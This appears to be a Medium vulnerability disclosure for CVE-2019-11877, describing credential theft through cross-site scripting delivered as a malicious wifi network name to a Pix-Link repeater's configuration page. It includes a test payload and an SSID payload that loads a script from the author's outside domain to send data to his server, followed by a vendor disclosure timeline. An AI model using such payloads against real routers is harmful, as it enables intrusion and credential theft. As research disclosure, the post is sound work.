[CVE-2019–11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a wifi repeater for my house and bought a Pix-Link LV-WR09 for being one of the cheapest. I thought “What could go wrong with that?”

When I entered the repeater configuration page I saw that in the network listing function it could be vulnerable to a Cross-Site Scripting attack over a wifi network with the malicious BSSID.

Image for post
Image for post

I used my smartphone to create a wifi network named

<script>alert(‘XSS’)</script> 

And did the test:

Image for post
Image for post
Yes! He’s vulnerable!!

Now it’s time to make a real attack.

The SSID has the restriction to fit a maximum of 32 characters, so I registered a small enough domain:

http://ilrg.xyz/

I changed the SSID in my smartphone to <script scr=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

Image for post
Image for post
It worked!

With this we have a POC!

Image for post
Image for post

http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf

https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120

https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/

28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure

Written by

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store